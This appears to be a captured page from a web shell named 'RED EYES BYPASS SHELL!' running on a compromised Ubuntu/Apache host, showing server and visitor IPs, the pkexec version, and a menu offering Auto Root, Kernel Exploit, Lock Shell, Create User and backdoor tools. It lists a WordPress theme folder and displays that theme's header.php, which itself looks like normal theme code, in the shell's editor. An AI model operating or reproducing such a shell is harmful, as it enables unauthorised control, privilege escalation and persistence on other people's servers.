Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
wp900 /
QAtest /
wp-content /
themes /
emerge-blog /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1004
B
-rw-r--r--
archive.php
1.61
KB
-rw-r--r--
comments.php
1.95
KB
-rw-r--r--
footer.php
1.14
KB
-rw-r--r--
functions.php
10.6
KB
-rw-r--r--
header.php
2.52
KB
-rw-r--r--
index.php
1.86
KB
-rw-r--r--
page.php
1.07
KB
-rw-r--r--
readme.txt
2.42
KB
-rw-r--r--
screenshot.png
202.79
KB
-rw-r--r--
search.php
1.87
KB
-rw-r--r--
sidebar.php
370
B
-rw-r--r--
single.php
1.61
KB
-rw-r--r--
style.css
55.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package emerge_blog */ ?> <!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php do_action( 'wp_body_open' ); ?> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'emerge-blog' ); ?></a> <?php if( is_front_page() || !is_paged() ) { get_template_part( 'inc/header', 'image' ); } ?> <header id="masthead" class="site-header"> <div class="container"> <div class="site-branding"> <div class="site-branding-logo"> <?php the_custom_logo(); ?> </div><!-- .site-branding-logo --> <div class="site-branding-text"> <?php if ( is_front_page() ) : ?> <h1 class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1> <?php else : ?> <p class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></p> <?php endif; ?> <?php $description = get_bloginfo( 'description', 'display' ); if ( $description || is_customize_preview() ) : ?> <p class="site-description"><?php echo esc_html( $description ); ?></p> <?php endif; ?> </div><!-- .site-branding-text --> </div><!-- .site-branding --> <nav id="site-navigation" class="main-navigation navigation-menu"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <?php echo emerge_blog_get_svg( array( 'icon' => 'bars' ) ); echo emerge_blog_get_svg( array( 'icon' => 'close' ) ); ?> <span class="primary-menu-label"><?php esc_html_e( 'Menu', 'emerge-blog' ); ?></span> </button> <?php wp_nav_menu( array( 'theme_location' => 'primary_menu', 'container' => 'div', 'menu_id' => 'primary-menu', 'menu_class' => 'nav-menu', ) ); ?> </nav><!-- #site-navigation --> </div><!-- .container --> </header><!-- #masthead --> <div id="content" class="site-content">
Close